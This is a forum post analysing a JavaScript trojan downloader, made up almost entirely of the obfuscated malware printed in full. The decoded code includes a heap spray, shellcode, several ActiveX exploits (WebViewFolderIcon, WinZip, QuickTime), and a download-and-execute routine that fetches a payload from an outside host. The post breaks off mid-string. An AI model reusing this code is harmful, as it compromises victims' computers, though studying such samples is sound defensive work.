Log in

View Full Version : JSTrojan downloader

Silkut
November 5th, 2007, 11:03
Hi,

This not a packed malware, nor an unknown one. I wonder if I must post it on a blog or if it fits here, anyway it might be interesting and I need your help concerning one point.

On some cracking/reversing forum I'm visiting (I call it website.com/forum/ and its redirection redirection.com here) a mate's AV turned crazy with a jscript being executed (credits to Guetta).
The AV is Kaspersky, and the script is identified as Trojan-downloader.JS.psyme.nc


http://www.redirection.com/wbicm.js
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> 

<html> 

<head> 

<title>Forum</title> 

<meta name="keywords" content="[...]"> 

<meta name="description" content="[...]"> 

<meta name="revisit-after" content="10 days"> 

<meta name="robots" content="INDEX, FOLLOW"> 

</head> 

<frameset rows="15,*" frameborder="NO" border="0" framespacing="0"> 

<frame name="ad" src="/frame.html" noresize scrolling="no"> 

<frame name="main" src="http://website.com/forum//wbicm.js"> 

</frameset> 

<noframes> 

<body bgcolor="#FFFFFF" text="#000000">    

<script language='JavaScript' type='text/javascript' src='bskrf.js'></script> 

<a href="http://website.com/forum//wbicm.js">Click here to continue to Forum</a> 

</body> 

</noframes> 

</html>



http://www.redirection.com/bskrf.js (The script was successfully catched using Opera, it failed with Firefox (404) which seems to be the target, in fact)
Code:
var arg="vxnhnuse"; 



var MU = "http://" + window.location.hostname + "/" + arg; 

var MH = ''; 

for (i=0; i < MU.length; i++) 

{ 

        var b = MU.charCodeAt (i); 

   MH = MH + b.toString (16); 

} 

MH = MH.toUpperCase(); 

if (Math.round(MU.length/2) != (MU.length/2)) 

{ 

   MH += '00'; 

} 



var MR = ''; 

for (i=0; i < MH.length; i += 4) 

{ 

   MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2); 

} 



var MU2 = "\"" + MU + "\""; 

var MR2 = "\"" + MR + "\""; 



var SB = 

unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c%64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2 f%64%69%76%3e%0a%3c%69%66%72%61%6d%65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%27 %20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%64%73% 2e%69%6e%76%69%74%61%74%69%6f%6e%73%2e%66%72%2f%73%73%70%2f%27%3e%3c%2f%69%66%72%61%6d%65%3e%0a%0a%3 c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%0a%76%61 %72%20%6d%65%6d%6f%72%79%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61%72%20%6d%65%6d%5f%66% 6c%61%67%20%3d%20%30%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%29%20%7b%20%6d%65%6d%6 f%72%79%3d%6d%65%6d%6f%72%79%3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76%69%6e%67%28%29%22%2c %20%32%30%30%30%29%3b%20%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72%61%79%53%6c%69%64%65% 28%73%70%72%61%79%53%6c%69%64%65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%7b%0a%09%77%6 8%69%6c%65%20%28%73%70%72%61%79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73%70%72%61%79%53%6c%69 %64%65%53%69%7a%65%29%0a%09%7b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70%72%61%79%53%6c%69%64% 65%3b%7d%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%73%70%72%61%79%53%6c%69%64%65%2e%73%75%62%7 3%74%72%69%6e%67%28%30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2f%32%29%3b%0a%09%72%65%74%75%72 %6e%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%6d%61%6b%65%53%6c%69% 64%65%28%29%0a%7b%0a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%3d%20%3 0%78%30%63%30%63%30%63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%43%6f%64%65%20%3d%20%75%6e%65 %73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66%65%62%25%75%33%33%35%62%25%75% 36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22%20%2b%0a%22%25%75%65%32%34%33%2 5%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66 %34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25% 75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%22%20%2b%0a%22%25%75%36%34%65%6 6%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65 %66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%35%31%31%25%75%30%37%65%31% 25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%22%20%2b%0a%22%25%75%63%61%3 8%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75 %62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65% 66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%22%20%2b%0a%22%25%75%30%3 7%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25 %75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31% 65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%22%20%2b%0a%22%25%75%3 6%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66 %25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66% 33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25%7 5%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65 %64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75% 32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22%2 5%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65 %38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25% 75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a%2 2%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62 %61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30% 25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%22%20%2b%0 a%22%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66%61%61%25%75 %65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65% 66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%22%20%2 b%0a%22%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25 %75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39% 65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%22%2 0%2b%0a%22%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65 %25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65% 37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%2 2%20%2b%0a%22%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63 %62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75% 65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%3 7%22%20%2b%0a%22%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66 %61%31%22%20%2b%20%20%20%20') + 

MR2 +

unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3 b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a%65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c %65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20% 68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28%70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%2 9%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30 %63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70% 72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d%20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72 %65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a% 09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42%6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%0a%09%09%6 d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70%72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%61%64%43%6f %64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f%66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67%28%29%3b% 0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%72%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%7 4%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20%28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%09%7b%0a%09 %09%74%72%79%7b%20%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62% 6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6 c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%30%78%37%66 %66%66%66%66%66%65%2c%20%30%78%30%63%30%63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63%2c%30%78% 30%63%30%63%30%63%30%63%20%29%3b%20%0a%09%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a%7d%0a%0a%6 6%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%29%0a%7b%0a%09%76%61 %72%20%78%68%20%3d%20%27%41%27%3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%67%74%68%20%3c%20%32% 33%31%29%20%78%68%2b%3d%27%41%27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%3 0%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72%65%61%74%65%4e%65%77 %46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73% 74%61%72%74%4f%76%65%72%66%6c%6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75%6d%20%3d%3d%20%30%2 9%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65 %58%4f%62%6a%65%63%74%28%27%51%75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6d%65%27%29%3b%09%09% 0a%09%09%09%69%66%20%28%71%74%29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d%6c%20%3d%20%27%3c%6 f%62%6a%65%63%74%20%43%4c%41%53%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32%35%44%35%2d%38%43%31 %37%2d%34%42%32%33%2d%42%43%38%30%2d%44%33%34%38%38%41%42%44%44%43%36%42%22%20%77%69%64%74%68%3d%22% 31%22%20%68%65%69%67%68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%30%70%78%22%3e%2 7%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68 %74%74%70%3a%2f%2f%61%6c%2d%77%69%6c%6c%69%61%6d%73%2e%63%6f%6d%2f%74%58%6c%77%70%4b%44%4c%2f%75%43% 66%49%58%72%55%63%56%70%79%63%4d%6b%56%6a%2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6 d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c%61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a %09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d%22%66%61% 6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%72%6f%6c%6 c%65%72%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a%65%63%74 %3e%27%3b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65% 28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%6 d%79%64%69%76%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0a%09%09%09%09%6e%75 %6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09% 09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4 f%76%65%72%66%6c%6f%77%28%31%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f %76%65%72%66%6c%6f%77%28%31%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%31% 29%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d%20%64%6f%63%75%6d%6 5%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%77%69 %6e%7a%69%70%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73% 69%64%3a%41%30%39%41%45%36%38%46%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d%42%41%34%31%33%46%3 0%33%34%39%30%34%22%29%3b%0a%0a%09%09%09%76%61%72%20%72%65%74%3d%77%69%6e%7a%69%70%2e%43%72%65%61%74 %65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%63%61%70%65%28%22%25%30%30%22% 29%29%3b%0a%09%09%09%69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29%20%7b%0a%09%09%09%09%69%66%2 0%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61 %72%74%57%69%6e%5a%69%70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a% 09%09%09%7d%0a%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%2 0%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28 %32%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28% 32%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%32%29%20%7b%0a%0a%09%09%74%7 2%79%20%7b%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63 %74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65% 72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%72%29%20%7b%0a%09%09%09%09%69%66%20%28%2 1%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61%72%74 %57%56%46%28%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d% 0a%0a%0a%66%75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%0 9%76%61%72%20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67%68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75 %76%77%78%79%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b% 0a%09%76%61%72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%20%27%27%3b%0a%09%66%6f%72%20%28%76%61%7 2%20%69%3d%30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76 %61%72%20%72%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%20%2a%20%63%68%61%72%73%2e%6c%65%6e%67%74%68%29%3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%2 0%2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a %09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63% 74%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%0 9%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c %53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65% 29%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%4 3%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61 %74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c% 28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2 c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20 %74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%22% 22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%2 9%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63 %74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28% 21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%6 2%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65%74%75%72 %6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64% 28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6e%28%22%4 7%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c%73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e%75%6c%6c %29%3b%0a%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72% 65%74%75%72%6e%20%78%6d%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6 f%6e%20%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20 %7b%0a%0a%09%74%72%79%20%7b%0a%09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f%2e%4d%6f%64%65%20% 3d%20%33%3b%0a%09%09%6f%2e%4f%70%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28%64%61%74%61%29%3b%0 a%09%09%6f%2e%53%61%76%65%54%6f%46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%09%6f%2e%43%6c%6f%73 %65%28%29%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09% 72%65%74%75%72%6e%20%31%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c%45%78%65%63%75%74%6 5%28%65%78%65%63%2c%20%6e%61%6d%65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%28%74%79%70%65%20%3d %3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d%65%2c%20%30%29%3b% 20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%20%65%6c%73%65%2 0%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%6e%61%6d%65%29%3b %20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%0a%09%72%65% 74%75%72%6e%28%30%29%3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44%41%43%28%29%20%7b%0a%09%76%6 1%72%20%74%20%3d%20%6e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31 %31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2c%20%27%7b%42%44%39%36%43%35% 35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%7d%27%2c%2 0%27%7b%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36 %31%37%31%31%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30% 30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%41%2d%30%30%30%30%2 d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%36%65%33%32%30 %37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%7d%27% 2c%20%27%7b%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%3 3%33%45%38%33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41 %32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27%7b%30%36%37%32%33%45%30%39%2d%46%34%43% 32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%7d%27%2c%20%27%7b%36%33%39%4 6%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%7d %27%2c%20%27%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34% 35%34%43%38%34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%4 2%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20%27%7b%45%38%43%43%43%44%44%46%2d%43%41 %32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c% 29%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41%72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%2 0%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%30%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76 %61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20%75%72%6c%52%65%61%6c%45%78%65%20%3d%20%20%20') +

MU2 +

unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20%26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%7 6%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29%20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c %3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65% 45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%7 5%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62 %73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%65%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20% 63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75%6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%2 